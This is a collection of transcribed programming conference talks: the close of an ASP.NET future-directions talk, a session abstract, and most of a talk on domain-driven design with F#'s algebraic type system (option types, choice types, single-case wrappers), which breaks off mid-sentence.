source folder. This is the part that's a little bit confusing to people. We know what a NuGet package is today. It's a zip file or a NuPkag that David is trying. He wants that to become a thing. This NuPkag is a package, right? But a package is also a project reference. So why not make another folder a project reference? So when you say, hey, I need a dependency on ASP.net MVC, it doesn't necessarily mean I need a NuGet package. I need a NuGet package or you don't have a NuGet package. Maybe you have source. Where is that source? Oh, it's over here. The source in the folder overrides any NuGets that I have. So then why not go into like view results, which is a deep inside of MVC itself. And every single time that we spit out a view, right before we render the view, why don't we say, uh, poo? Why not, right? This is the actual source for MVC, all of MVC. Okay, so then let's take a look at this. Now, again, the goal is to make this work such that I could be in MVC making changes in MVC proper and just hit refresh. When you hit control shift B in the next version of ASP.net, it does not build. It'll say it's building, it's a lie. It is actually spell checking. It does the compile so it can tell you the syntax errors, but there's no build step. There's no build step. So now here, I've changed the source code for MVC myself to change that. And if I wanted to switch it back, I can just remove that, hit save, and hit refresh. All of MVC compiles, all of my app compiles, and the whole thing just works. And if I wanted to go and remove that global as JSON and switch back from source over to the packages, then that would work as well. So this is the direction, ta-da, sub second, any minute. This is the direction that we're going with ASP.net. We're going to take a break. We'll come back, and it's going to be an hour of answering questions with code with Damian and David. Thank you very, very much. APPLAUSE...........
|
It’s an exciting time for ASP.NET. What does the next version of Visual Studio and ASP.NET bring to the world of web development? Where does ASP.NET fit into the world of HTML5? What is One ASP.NET and how does it affect you? What role will MVC and WebForms play as technologies like SignalR, Web API and SPA gain traction. Will it all snap together in a way that makes sense? There's cross platform issue, Roslyn, a new CLR and more. Join Scott Hanselman as he share some internal documents, future thinking, open source, and exciting surprises about the future of ASP.NET.
|
10.5446/50868 (DOI)
|
Okay. Can everyone hear me okay? Up all the way at the back. Can you hear me? Yeah. Yeah. Okay. Good. Right. So this talk is domain driven design or domain modeling with the F-sharp type system. It's not really, I'm not going to go through a lot of domain driven design. It's more about how can you construct a domain model with the F-sharp type system. So I'm going to be explaining about algebraic types and how you can use that for designing. So a little bit of domain design, but mostly about the F-sharp type system and algebraic types. So hopefully that's what you're interested in. So I'm going to start with a challenge here. How many things are wrong with this design that you see on the screen? So you probably have seen this kind of code, millions of times. It's a very simple contact or a person. There's a first name, middle initial, last name, an email address, and a flag to say whether the email address has been verified by sending the contact to an email to verify. So you might think, well, I'm not going to say it's about syntax. I'm actually talking about from a design point of view, how many things are wrong with this code? And I think you'll find there's quite a number of things wrong. Hopefully I'll surprise you with some of the things that I'll say. So before we start on that, though, let me just talk about the software development process. And just like any process, there's an input, and there's the process, and then there's the output. And one of the things that we do in conferences like this is we normally talk about the process, which is the coding and the testing and the tooling and continuous integration and continuous deployment and all these things. I think one of the problems with that is there's this well-known truism, which is if you have garbage in, you get garbage out. So we tend to focus on the process, but really what we should do is focus on having less garbage coming into the process in the first place. So what I'd like to do in this talk is really focus on reducing the amount of garbage that comes in and then hopefully that reduces the amount of garbage that comes out. So reducing the amount of garbage that goes in is really the design process. So if you have a good design process, you can actually guarantee good output. If you have a bad design process, all the best tools in the world will not necessarily guarantee a good output, or at least there's a lot of extra effort to guarantee that extra good output. So that's what this talk is about. How can we have good design and how can the language that you use help you with that design? And I think that F-sharp is actually an excellent language for design purposes, not for coding, for design. So here is our contact again, and I propose to you that this is actually a very garbage-riddled design. If you use this design, you might have lots of errors in your code that would be completely preventable if you use the different design. So the first question of this design, one of the reasons why this is not a good design, is it's not very clear which values are optional. So the middle initial probably is going to be an optional property or an optional field. The first name might be required, the last name might be required, the email address might be required. It's not clear from this design. So when it comes time to coding, you won't actually know. So there's going to be a communication gap straight away between coding and the design. Now you might code it so it's optional, but that's going to be buried in your code. And when someone else comes along, they're going to have to look at your code to find out whether it's optional or not. So in this case, the middle initial is optional. It'd be nice if we could somehow put that optionality into the design itself. What about the constraints? So if we take the first name, it says it's a string. So does that mean you can put two billion characters into the first name? Can you have line feeds in the first name? There are constraints on the first name, which a string does not represent. Now again, you probably have some validation logic in your code, but that's in the code. Can we actually represent that in the design? So in this case, the string is not allowed to be more than, say, 50 characters. What about which fields are linked together? So what I mean by that is in terms of concurrency, I can, if one person updates the first name and another person updates the last name at the same time, that's going to be a concurrency error. But if one person updates the first name and someone else updates the email, that might not be a concurrency error. Is there a way of communicating that through this design? In this case, it's pretty obvious that the name part is separate from the email part. And finally, what's the domain logic? So we have this isEmailVerify flag. That means I sent you an email and you clicked on it, so I know that you actually are the owner of that email. But where is that logic in this design? I mean, that's just a boolean. Anybody could set it to true or false. I mean, I've called it something, but the logic is not encoded in the design. So in this case, the logic is that if the email is changed, I have to reset it to false. If you change your email, I have to re-verify you. So here's all the questions again. Which value is optional? What are the constraints? Which fields are linked? And what's the domain logic? And I think that F-sharp can actually help with all of these questions. So domain modeling in the F-sharp type system. My name's Scott Voloshin. My Twitter handle is Scott Voloshin, very cleverly. I have a website called fsharpforfunandprofit.com. And I have a consulting company called FP Bridge. And if you want these slides, if you go to fsharpforfunandprofit.com, the slides will be there and some other links will be there too. And I'll post the video there too when it's ready. Right, so domain-driven design. Hopefully, how many people have read domain-driven design? Most of you? Yeah. So the main quote really from domain design is you focus on the domain and the domain logic rather than on the technology. So you're trying to capture something in a way that anybody can understand. It's any business person can understand it. It's not about writing it in code. It's not about using clever technologies. It's about communication really. So domain modeling and DDD is a quite big topic. Functional programming is another quite big topic. This talk is really going to be on the overlap of those two things. It's not a particularly common area, but I think it's actually a quite profound thing to talk about. So first of all, I'm going to spend a little bit time demystifying functional programming because I think a lot of people are kind of scared. So I just want to take away some of that fear. I want to talk about functional programming is actually a useful thing for real world applications. It's not just some academic theoretical thing. I'm going to compare F sharp and C sharp. How many people use C sharp here? Everybody, right. And I'm going to then talk about the F sharp type system. And then I'm finally going to talk about how you use the F sharp type system to design real things, really practical things. So let's start with demystifying functional programming. Why is it so hard? I think a lot of people are put off by it because it's very scary. You have all these words like functor and catamorphism, currying and monad. These are very scary sounding words. And I think the reason is, yeah, there's Homer, he's quite scared. The reason is because the mathematicians got there first and they named these words. Now, if we renamed the words differently, they wouldn't be so scary. So for example, I think these words are just unfamiliar. Not scary. So if we named things like functor, if we called it mappable instead of functor, and if we called it collapsible instead of catamorphism, we said aggregatable or chainable. So those are still words you might not understand what they mean, but they don't sound so scary. So here's Homer. I mean, he doesn't understand them, but he's not frightened by them anymore. It just means it's something you have to learn, just like you have to learn entity framework, or you have to learn the link, or you have to learn WCF, if anyone knows how to do that. So I tell you what, it's really scary, it's object-oriented programming. You just don't think it's scary because you already know it. But if you're a new person coming to programming and you're faced with object-oriented programming, this is what you have to deal with. You have to deal with all these scary words, like polymorphism and inheritance and interface and generics and covariance and countervariance and solid. And solid itself is five different things, SRP, OCP. No, there's a lot of things you have to remember. Each one of those abbreviations, and you've got IOC and DI and ABC and MVC and AOP and thousands of little things you have to know. So that's really scary. So functional programming is actually a lot less complicated than object-oriented programming. It's just that you're more familiar with object-oriented programming. The other thing about all these words is you're not going to need it for this talk, so I'm not even going to talk about any of them. All right, so don't worry that I'm going to be mentioning them. So let's talk about functional programming for real-world applications. So you've probably heard that function programming is good for mathematical stuff and it's good for complicated algorithms and it's really good for parallel processing, but you need a PhD in computer science to understand it. So the first three things are actually true. It is good for all of those things. It's so not true that you need a PhD. I'll tell you what, I think functional programming is really good for. It's really good for boring line of business applications, blobbers, I call them. So I think how many people make their living writing blobbers? Yeah, pretty much everyone writes boring line of business applications. So that's e-commerce websites and accounting packages and ETL data warehouses and I don't know, all sorts of stuff, back-end infrastructure, whatever. So that's basically what we do every day. But I think functional programming is actually really good for that. So let me tell you why. If you're going to be doing Blobber developments, first of all, you need to express requirements very clearly because you're working with customers and sometimes they don't quite know what they're talking about. You need to have really good communication. Secondly, you need to have a rapid development cycle because you want to get the code out there before the customers change their mind, which they probably will next month or next week. So if you can have a rapid development cycle, then you can actually get the code to live them and then they're happy. And finally, you need high quality because there's nothing worse than trying to fix a bug for something you did six months ago. You want to be working on new stuff. You don't want to be fixing old stuff. And then you look stupid if you have bugs as well. So what's interesting is that all these requirements are actually is where the agile movement came out of, XP came out of Chrysler. The whole thing of expressing requirements clearly, that's behavior-driven design and customer-on-site customer and all this kind of stuff, rapid iterations. F-sharp is good for that because it's concise and it's really easy to communicate. So it's actually better than C-sharp for that. The rapid development cycle, again, that's where you have your continuous integration and your continuous deployment. F-sharp is good for that. It has a REPL where you can actually code interactively. And it has many, many convenience to avoid boilerplate in your code. So you can actually churn out a lot of code much faster in F-sharp. And finally, the high quality deliverables, of course, you have your unit tests and so on. And in F-sharp, you can do unit tests as well, just because it's a.NET language. You can use N unit. But the type system can actually be used to ensure correctness at the design time. And that sounds, you can actually encode business logic into the types. That sounds like a very strange thing to be able to do, but you can actually do it. There's one other thing which is really important. If you're doing boring business applications, you need to have a bit of fun, OK? Because the applications might be boring, but hopefully at least your coding is fun. Now, the nice thing about F-sharp is F-sharp is actually a fun language to code in. I don't think anyone thinks that C-sharp or Java are fun languages. They're useful, but they're not exactly fun. I think Python is more fun. Ruby is a bit more fun. F-sharp is fun. And in fact, fun is even a keyword in F-sharp. So they know what they're talking about. So F-sharp is really good for Blobber development. So let me just show you some F-sharp and C-sharp codes. And you tell me which one you think is better for domain-driven design, OK? So in domain-driven design, we'll start with a simple immutable object. In domain-driven design, that's called a value object. So how would you implement a value object in C-sharp? Well, first of all, what is a value object? So a value object is basically an immutable object which is based on comparing all the properties. So if you have a personal name, two personal names, if the first names are equal and the last names are equal, they're basically the same thing. They might be different objects, different pointers, but from a logical point of view, they're the same object, which means they have to be immutable because they can't be changing underneath you. So here is a C-sharp version. We have a constructor with the first name, last name. We have two properties. I'm using private setters for immutability. Not really immutable. I could be using read-only if I was going to be super strict. But that's probably good enough. Something I've left off, though, is that personal name is a reference type, like all classes in C-sharp, which means if I have two personal names and I compare them, they're going to compare differently. So what I have to do is I have to override equality. So I have to override it, get hash code, and I have to override equals, and I have to add equals again, and I have to implement i, equitable, whatever it is. So there's a lot of code you have to write to do equality. And this is actually quite bug-ridden code. I don't know if any people have ever put objects in a dictionary or a set with a mutable ID and the hash code's changed and all of a sudden things break. It's very easy to get this kind of stuff wrong. So let's compare this with f-sharp. So in f-sharp, this is your personal name. You've got a first name and a last name, exactly the same thing, two properties. The whole thing fits on one under code. But of course, I need to do equality as well. So let me show you the code for equality. So yeah, there is actually no code for equality because in f-sharp, classes or types are equal by default. You don't have to override equality. So it's the other way around. If you want them to not be equal, you have to do it to work. And the best code is no code of all. If you don't write equality methods, you can't mess them up. So it's less work for everybody. Now, in domain driven design, you also have this concept of an entity object. An entity object is normally based on some sort of ID. And here's an example of a person. And the person ID, if they have the same ID, they're the same thing. But the contents of the thing can change. So this person has changed their name from Alice Adams to Bill Wobaggins. And generally, the content is mutable. That doesn't have to be mutable. So let's look at the C-sharp code, very same kind of thing, except I've removed the private setter to make it a mutable name. And I have to override equality again. And now I have to change, subtly change the way I compare things. Buried in the code is the important part. Let's look at the f-sharp code. Now, in f-sharp, if you want to change the way that equality works, you have to say custom equality. You have to override equality. And then you have to get hash code and equals just like the C-sharp code. The nice thing about f-sharp, though, is the person cannot be null. So you don't have to do any null checking ever, unless you're dealing with code that's coming from C-sharp, where you don't necessarily trust it. So. But in this case, we're comparing by ID. But in many situations, you might not want to compare by ID. Sometimes you might compare by person, by the name. Sometimes you might compare by ID. And it may be that you want to use different comparisons into different situations. So rather than always having a default comparison, you can pass in i-comparables or whatever it is. What I like to do in f-sharp is actually say no equality. And what that allows you to do is say that you cannot compare people directly. You can't say this person is equal to this person. You can say their IDs are equal. You can say their names are equal. But you can't actually, if you actually try and compare them directly, you actually get a compiler error, OK? Which is, I think, a very cool thing. I think most entities should have that by default. So the other thing in f-sharp is that the person class is immutable, unlike the C-sharp class. And let me tell you some of the advantages of immutability. So if it's immutable, the only way you can change it is make a new one. You can't just change the property. You have to create a whole new person every single time. And there are some syntax things in f-sharp that make that not so hard. But if you do have to create a new person every single time, the advantage of that is you can validate the data on construction. So in the constructor, you can say it's the name blank or whatever. And if it's a valid thing, you can return a new person. And if it's not a valid thing, you can not return a new person. And that's the only way you can create a person is through that constructor. And that means that any change has to go through that checkpoint, which means that there's only one place you have to enforce invariance. So I don't know if you've ever had code on the setter of a property. You've had to check that it's not blank or check that it's not null. And then if it is null, what do you do? You're going to throw an exception, or you're going to have an object which is in an invalid state. You don't really have very many good solutions to that problem. If you don't allow an invalid object to be created in the first place, you eliminate a whole class of problems right there. So let's have a look at the C-sharp code that we've got so far. There we go, the personal name and the person. So let me ask you a couple of questions. Do you think this is a reasonable amount of code to write for these two simple objects? All right, I think the answer is no. I think that's way too much code. And secondly, do you think a non-programmer could understand this? If I was showing it to an in-house customer and I say, have I got the definition of a name right? Is this what you mean by a personal name? I think they would say, well, I can't understand all this weird stuff. The other thing is you can't really tell which ones are values and which ones are entities. You can use market interfaces. But the important stuff is sort of buried right in the middle of the code. It's not at all obvious how they compare the ones of value type, and it compares on properties. And the other one is an entity, and it compares on its ID. OK, let's look at the F-sharp code. So there's the personal name, and there's the person. So let me ask you the same two questions. Do you think this is a reasonable amount of code to write for a simple object? And I think, yes, I think there's pretty much a small amount of code you shouldn't get away with writing. Secondly, do you think that a non-programmer could understand this? If I went to somebody and said, have I got the right definition for a personal name, like a business analyst or something, and would they say, yeah, I can understand that? I don't understand F-sharp, but I can look at this code and say, yeah, actually you're missing a middle initial, or you're missing an email address or something. It's pretty obvious just by looking at it. You don't have to be an expert in the language to understand this code. So comparing C-sharp and F-sharp. So this is just now, I'm not saying that C-sharp is a bad language, but I'm saying from the design point of view, if you're just designing types, I think that F-sharp wins out over C-sharp. Value objects are really easy. Entity objects are really easy. Value objects by default. Immutable objects by default. You can tell them apart, and it's easy to understand by non-programmer. So if you do nothing else, you might consider just using F-sharp for doing your types or your classes. And it's just an assembly. You can link it in with your main C-sharp code. So if you want an easy way to create immutable classes, have an F-sharp assembly and just do that. Don't have to write any other F-sharp code whatsoever. Just do that bit and then use those classes in C-sharp. So this last thing, whether it's understandable by a non-programmer, I think that's a really important point. Again, it's all about communication. So let's look at F-sharp for domain-driven design. And like I said, domain-driven design is about communicating a domain model within the team. So communication is a hard problem. If we take this word UNIO-NIZE, what does that word mean? Well, if you're an activist, that might mean unionize. If you're chemists, it might mean un-ionize. So the same word can mean two different things to do two different people. So in domain-driven design, there's this concept of a bounded context, a framework within which the words mean something. So if you're talking about social activism, unionize means one thing. If you're talking about chemistry, un-ionize means something different. So different domains, different bounded contexts, same word. So it's very important to define the context that you're using that word in. So let me give you another example. SPAM. So if you run a supermarket, spam means one thing. And if you're an email admin, spam means another thing. These are kind of cheap shots. These are pretty easy. Everyone knows these ones. What about products, though? What does a product mean? So this is something you might run into. Like if you're in the sales team, a product is something you can sell. But if you manage a warehouse, a product might be a physical thing that you can put in a box. And sometimes the things you can sell are not necessarily the same things that you can put in a box. And you start getting this miscommunication between the teams. So one of the goals of Domain with Design is to define these contexts and make sure the words are used appropriately in each context. Here's another one. Customer. You probably run into this one, too. From a marketing point of view, a customer, if anyone has an email that you can send them spam to. If you're in finance, a customer is someone who's given you money. It's a different definition. And it affects your design, because a customer who's given you money, you might have an account ID, and you might have a current balance and stuff. And from a marketing point of view, a customer is just an email address, and maybe not even a name. So this brings us to the topic of ubiquitous language. So if you're working in a domain like chemistry, say, chemists have these words, like iron, and atom, and molecule, and polymer, and so on. Now as developers, if you're working on an application in the domain of chemistry, it's very important that we use the same words that chemists use. We shouldn't talk about molecules as an aggregate of atoms, and we shouldn't talk about polymers as a linked list of atom aggregates or something. Those are techy words. We should use the same words that the customers use. So again, part of the process of domain-driven design is to come up with a set of words that the developers can use and the domain experts can use, and that we all agree on them. And then when we talk about a polymer, we have a class called polymer. We don't have a class called list of atom aggregates or something. So again, the ubiquitous language can look similar in different domains. So in the sales domain, you might have something called a customer and something called a product. In the warehouse domain, again, you might have something called a product, but it's a different kind of thing. So but defining the ubiquitous language in a domain is a very important part of domain-driven design. So here is an example of some F-sharp code for a domain. So this is a domain of a card game. How can we tell it's about a card game? Because there's a word at the top that says this is a card game. If this was in a different domain, if I was in the domain of a clothes shop, then suits would mean something completely different. And if I was in the domain of the navy or something, then deck would mean something completely different. But in the domain of a card game, in the bounded context of a card game, these are the things that matter. And so this is the ubiquitous language right here. So let me just go through this F-sharp code. The vertical bar means a choice. So a club or a diamond or a spade or a heart. The star means a pair in this case. So a card is a pick one from a suit, pick one from rank. That's your card. The list is actually a keyword in F-sharp. That's very nice. And this one with an arrow is a function. So this means to deal something. You start with a deck. The one on the left side of the arrow is the input. On the right hand side of the arrow is the output. So you start. The input is a deck. The output is a different deck with a missing card plus a card on the table. So that's the output. So that's the entire domain on one page. So let me ask you the same questions. Is this the reasonable amount of code to write for this domain? I've got nine classes on one page. So I think that's pretty good. In C-sharp, if I was doing this, there would be nine files in a folder, probably. Do you think a non-programmer could understand this? If I had left off something like the king, do you think I could show this to a non-programmer and say, have I left all the cards right? And they would say, yeah, no, you left off king. It's like, oh, thanks. It wouldn't be buried in some enum somewhere. Another important point about this code is there's nothing about databases here. There's nothing about user interface. This is persistent Ignoment. Persistence Ignoment. There's nothing about how it gets stored. I don't care whether you store this in a SQL database, whether you store it in a file system. If you want to be web scale, you can store it in Mongo. It doesn't really matter. It's not part of the domain how it's stored. And the other thing about this code is this is code, and it's a design as well. It's a design and code at the same time. And that is one of the agile philosophies, really, is that the most accurate thing to represent your design is the code. Comments go out of date. Documentation goes out of date. The only thing that is the truth about your application is the code itself. So it's nice if your code can actually represent your design in a nice way. And this is actually not pseudocode. This is compilable code. I could take this code, stick it in Visual Studio, and run it, and get some stuff out. So this is not pseudocode. So I think that's really quite a powerful thing. If you do this kind of approach, you don't need to have your mail diagrams. OK. No new mail, no documentation, just the code itself. The code acts as documentation. If you change that code, at least you add a new type to a new kind of card, for example, your code will fail to compile because it's compilable code. Right, so that's the sort of introduction to domain driven design. And let's talk about the F-sharp type system. So the F-sharp type system is very different from what you're used to in C-sharp. So in C-sharp, you have classes. In F-sharp, you have types. Types are not the same thing as classes. And the F-sharp type system is called an algebraic type system, which is the same type system that's used in Haskell, and the same thing that's used in OCaml, a couple of other languages, very common in functional languages. So algebraic is another one of those mathematical words. So I'm going to use the word composable instead. So it's a composable type system. So unlike objects or classes, you can actually compose the types together to make new types. So what do I mean by composable? It's like LEGO, right? If you take two LEGO bricks and you stick them together, you've got another thing that you can then stick other things to it. You can build up complex things by gluing smaller things together. So that's what composable means. So if you do have two smaller things, how do you glue them together to make a bigger thing? Well, in algebraic types or composable type system, there are basically two ways you can glue them together. You can either multiply them together. So a new type is an old type times another old type. Or you can add them together. So a new type is a type plus another type. Now at this point, you might be thinking, well, that's just crazy. How can you add two types together? How can you multiply two types? What does that even mean? That just sounds silly. But I think if you just hold on another five minutes, I think all will become clear. So let's start off with the times. So here's a very simple function. So a function is basically a black box. It's got input and it's got an output. That's all the function is. So I'm going to take the function add1, for example. So on the input, I have a list of numbers, integers. On the output, I have a list of integers. And the way you write that in F sharp is int arrow int. So int is the input function output is an int. So that's pretty straightforward. Now what happens if we want to add a pair of numbers together? So if we add one to it, the input is a pair and the output is added together. So the output is easy. We can say the output's an int. But what's the input? What kind of type is that input? Now we could define a class called pair, but that's got nothing to do. It's not built from smaller pieces. I want to actually create this type by adding two other types or combining two other types. So let's look at how we can do that. So let's think about what a pair is. So a pair basically means you pick one from the first pile and you pick another one from the second pile, right? So one column and the second column. So let's say there are four numbers. Obviously there are like 64k of four gig numbers, but let's say there are four numbers only. So you can pick four from this pile and you can pick four from the second pile. How many possible pairs are there? There's four times four, 16 possible combinations, yeah? So that's multiplying them, right? Four times four is 16. Here's another example. Let's say you have a pair of booleans. So true false and true true and false false, right? So again, the first column is you pick one from two possibilities and the second column is you pick one from two possibilities and the total number of combinations is two times two. So the way you get the pair is by multiplying the first column by the second column. So that's the total number of possibilities. So in fact, that's exactly how you do it in F-sharp. You say a pair of ints is written as int star int, int times int. And a pair of booleans is written as bool star bool. So literally multiplication, OK? So you can see where that's coming from. It looks a little bit weird at first, but it's actually quite sensible if you think about it. All right, well, that seems kind of academic. Maybe say, OK, well, it's kind of theoretical. Let's look at a real example of how you might see it in a real business application. So let's say you have a bunch of birthdays. So Alice was born on January 12th and Bob was born on February 2nd and so on. How can I represent these birthdays using the type system? Well, we have a set of people. The first column is a set of people, all the people in the world. The second column is a set of all the dates in the world. And every possible combination of a person and a date is multiplication. So that's how I get the birthday type is the every possible combination of the people type and the date type. So in code, in F sharp code, you would write it like this. Type birthday equals person times date. And that's how you create a new birthday type. Right, so that's one kind. So that's what they call a product type or a multiplication type. What about the other one where you're adding things together? So let's look at how you might represent a choice. So here's a function that says whether you have a fever or not. You're passing some sort of temperature. And if your temperature is more than 37 and 1⁄2 or 38, where it says, OK, you've got a fever. And if it's in Fahrenheit, there's 100s, say, and you get a fever. So how can I document what the input is? Well, the output's tabooly, so that's easy enough. But the input is a choice. I can either pass in a Fahrenheit temperature or I can pass in a Celsius temperature. How do I represent that? So if you think about it, this is the same kind of thing. I've got a list of possible temperatures in Fahrenheit. And I've got a list of possible temperatures in Celsius or centigrade. But this is slightly different because I pick one from the first pile or I pick one from the second pile. So let's say there are four in the first pile and four in the second pile. How many possible combinations are there? There's actually only eight. I pick one of these four or I pick one of these four. So there's eight possible combinations. So that's addition. It's what they call a sum type. And how do you represent it in F-sharp? They're both, say, integers. So you have to have some way of differentiating the integers, so you tag them with a little symbol. So I'm going to tag the Fahrenheit ones with the letter F. And I'm going to tag the Celsius ones with the letter C. And then you write that in F-sharp as the temperature type is a choice between an integer, which is tagged with F, and a, say, a float that's tagged with C. So that's how you'd write this choice type in F-sharp. It could be one or the other, but not both at the same time. All right. So again, that's maybe a bit strange. But let's have a look at a real example. So here's a payment method. So as an e-commerce business or maybe as a shop, I can take cash, I can take checks, I can take credit cards, say. And you'd represent that as three different choices. I can take cash, I can take checks, and I can take credit cards. Three different choices right there in front of you. One of the nice things about these choice types is you can have extra data attached to different pieces. You can think of them as different constructors. You might have a cash constructor and a check constructor. And the cash, you don't need any extra information. For a check, you might need the check number. And for a credit card, you'd need the card type and the card number, so a pair. And when you actually use these things, you want to look inside and see which particular choice was actually used. So when, let's say, you want to print the payment method on a receipt or something. What you do is use a match statement, which is the F-sharp equivalent of a switch, basically, or case statement. And if it's cash, you say print cash. If it's a check, you say pay by check. And one of the nice things about the matching is it extracts the information inside at the same time. So you match and you suck out the data. And finally, if I pay by card, I can get the card type and the card number at the same time. So that's how choice types work in F-sharp. And it's very cool that you do this match and assignment in one step. So these are not just enums, like in C-sharp, because enums are just integers behind the scenes. This has, these are more like subclasses, and each subclass has its own data. So you might say, well, why don't you model it with inheritance? Why don't you use subclasses? Why have this special kind of choice type? So how would you implement this in C-sharp or an OO language? So what you'd probably do is have some sort of interface or abstract-based class that represents all of them, an I payment method. And then you'd have a cash class or subclass with a constructor, you'd have a check class that had its own data, and you'd have a credit card class that had its own data. So the problem with this approach is that the interface has no common behavior really between the two. I mean, you might say, well, yeah, the printing method is a common behavior. But that's really in that context. I don't think it should be part of the core domain class that it can print itself on a receipt. That's really mixing, you know, that's not separating your concerns well enough. You should be able to print it on a receipt is a different thing. There's actually no common methods that belong to the domain. The other nice thing about the F-sharp approach is the exadata is really obvious. If I say, well, what do I need to store a credit card? It's like, well, I need a card type and I need a card number. Is that obvious from the C-sharp codes? It's kind of buried in the constructor. It's buried in the properties. It's not really obvious where it is. It's basically scattered around in many locations. And in C-sharp, that would be four different files, probably. You could have one class per file, four different files. In F-sharp, it's four lines, four lines of code in one place. The other thing about the F-sharp code is it's closed, which means that you can't add a fourth option. That is your limit. If you want to add a fourth option, you can, but all your code will break. And then you have to fix up your code, which I think is a good thing. If you add a new kind of payment method, you want your code to break until you've handled that particular new payment method in all your class, in all your code. In OO, in the OO version, anything that implements the I payment method is valid. So you might get an unpleasant surprise. I might implement an evil payment method. As long as it implements the interface, it's totally valid. Now in some cases, you might want open. You might want to have, oh, anybody can implement this interface and it's fine. I trust them. But in business logic, most of the things are actually quite restricted. You have a restricted set of options like payment methods. And adding a new one is actually something you want to know about. It's not something that you should just slip in behind the scenes without telling anybody. So what are types for in functional programming? It's an annotation to a value for type checking. So here we go. It's just like in C-sharp. You say this is an int. It takes an int and it outputs an int. But it's also a domain modeling tool. So in this case, I can tell you that to deal something, you have a deck of cards. And you input this and you output that. So you can actually model the domain using the types. And it's both at once, which means that your domain modeling tool is also compiled into your code. So your code can never match the domain. So I think of a static type system like this is almost like having compile time unit tests. If I have a unit test that says, oh, a payment card must always have a card number or something, I don't need to have a unit test for that. It will not compile if the code doesn't match the domain. So it's a compile time unit test. So type all the things. It's one of the mottos of the static type people, especially the functional programmers. All right, so what can we do with this type system? Let's actually put it to use, do something useful with it. I'm going to start with optional values. This is a really common case. So here we have our personal name. And the middle initial is optional. And the first and last name are not optional. And I can't tell. So can I use the type system to indicate that? So let's go back to our strings. So let's say we have a function that's the length of a string, really, really simple function. And the input is a string, and the output is an int. That's a very simple function. The only problem is that we have null in this list of strings. And null is evil because it's pretending to be a string. You cannot use null as a string. If I say setPhase as to null, that doesn't make any sense. It's illogical. So null is not really a string. It's in the pile of strings. If I say to null, are you a string? I say, yeah, yeah, I'm a string. And then you say, well, give me your length. And you say, ha, you know, I'm going to crash your application now. And it's like, well, you told me you're a string. It's like, well, yeah, I'm pretending to be a string, but I'm not really. So I think of null as like Saruman. OK, it's going to betray you behind your back. It pretends to be one thing, but it's something evil. So in F sharp, null is not allowed. Null is not a valid string. Well, actually, in F sharp, unfortunately, it is a valid string because of the way that it has to be compatible. But most of the classes you create, your own classes in F sharp are not allowed to be null. So you never have to deal with nulls in general. So no nulls. So if you don't have nulls, what can you do instead? So we have a list of strings here. And null is not in them. But we want to say, well, maybe the string's missing. So how can we indicate that? Well, we've already seen how we can do that because we have this choice between something and nothing. So the way we represent that in F sharp is exactly that thing. You have a choice between a string, a valid string, which is not null, and nothing at all. And it's a sum type. It's a choice type. And we tag the strings with some string. And we tag the missing with nothing. So you see the some string or it's nothing. And we write that like that. So it's either some string or it's nothing. So that's a type that you would see a lot in F sharp. And you say, oh, that's really cool. You have the optional string. And then, oh, I want optional int as well. Oh, optional Boolean's really important. So you start having all these optional types floating around. And at some point, you say, there must be an easy way to that. So let me define a generic type that takes a type parameter. So in this case, it's an option of any type. And it's either some of that type or it's nothing, none. And that type is actually built in to F sharp. So this option type is built in. And it's used a lot in the F sharp libraries. So with this option type, we can rewrite the middle initial to say it's an option of a string. And in F sharp, you can actually have a nicer syntax where you call it a string option rather than an option of a string. So I think that's actually much nicer if I was showing that to someone I say, look, it's an optional string. I think it's pretty easy to understand. All right, the next kind of type I'm going to talk about is what I call single choice types. And this is an example of a single choice type. It's something and it's choice A of something. But there is no choice B. There's only one choice. Why would you only have one choice? So let's look at some examples. Here's an email which has only got one choice of an email. Customer ID has only got one choice called customer ID. Why would you only have one choice? What possible use is that? So think about this for a second. Is an email address just a string? All right, in your domain, can you add hello to it without breaking code? Can you reverse it without breaking stuff? An email address isn't a string. Once you've validated it, you really shouldn't be messing with it. You shouldn't be adding things and subtracting things. You shouldn't be reversing it. It's like it's a thing. It's an email address. It happens to be represented as a string, but it isn't really a string in your domain. Is a customer ID just an int? Can you add five to your customer ID and still get a valid customer ID? Probably not. I mean, maybe you can. But your customer IDs, they might be represented by ints in your database, but they're not really ints in a domain. So by using single choice types, you can keep these types separate from their underlying representation. So for example, if you have an email address which is represented by a string and a phone number which is represented by a string, by wrapping them in a single choice, you've now made them different types, distinct types, and you can no longer compare an email address with a string, and you can't compare it with a phone number, and you can't compare a phone number with a string. They're just completely different types all together. And you'll get compile errors, compile errors if you try and compare them. Similarly, if you have a customer ID and an order ID, and this is a very common problem, they're both represented by ints, and in your codes, you want to keep them separate in your query strings to your DAO or whatever. They're not the same thing. If you try and compare them, you should actually get a compile time error. So are you familiar with the phrase primitive obsession? So the primitive obsession is when you use ints instead of domain objects like this. You shouldn't be using ints to represent customer IDs. The other nice thing about using a special type for the email is you can wrap it in a constructor that does validation. So an email address is not just a normal string, it has to have an at sign in it, say. So very crude validation is that it has to match some sort of regex. So in this case, it has to have an at sign in it. So in the constructor, you can say, well, if it does match that regex, then you return a new email address, a wrapped email address. But here's the problem. What happens if it doesn't match the regex? What are you going to do? You're going to return null? No, because null is not a valid email address. You're going to throw an exception. Well, that seems a bit harsh. Just because I passed in a invalid email, it's like, can't you just give me something more useful that I can process as a, well, they have to catch exceptions all the time. Well, I think we already seen the answer to this. You use the option type. So if it's a valid email, you say, yes, it's an email, some email, and if it's not a valid email, you turn nothing. It's like not a valid email. But this is a proper type. You're not throwing exceptions. You're not returning null. And you can tell what it does, unlike the null case or the exception case, you can actually tell what it is by looking at the signature for the function. So you might think that the signature is, give me a string and I'll give you back an email address. And that would be true if I was using nulls, and it would be true if I was using exceptions. But I'm not using either of those. I'm using options instead. So the signature says, you give me a string. I might give you back an email address. I might not. You'll have to handle both cases, because depending on what string you give me, I might give you back nothing at all, because it's not valid. And you are forced to handle both cases. When you take this code, at some point in your code, you're going to have to say, well, is it something or is it nothing? But you can pass it around. You don't have to handle it straight away. It's not like an exception or a null. You can pass it around until somebody has to deal with it. So let's look at another example. Here's a string 50. In this case, I want to make sure that the string is constrained to be less than 50 characters long. So again, I have a little in the constructor. I have a little test. Is it less than 50? If it is less than 50, I can return a valid string 50. And if it's not a valid, if it's not, I return nothing. So the constructor, the signature for the constructor looks like this. Pass in a string, and I might get better string 50 or I might not, depending on whether you passed in a string that was too long or not. Here's another example. If I say this is an e-commerce system, and I've actually seen this in a real e-commerce system, what is wrong with that picture is that I have like a million things in my shopping cart. That should not be possible. I shouldn't really be able to add a million things. Or maybe I can, but most shopping sites will not let me do that, but they might let me do that because somebody has only represented it by an int behind the 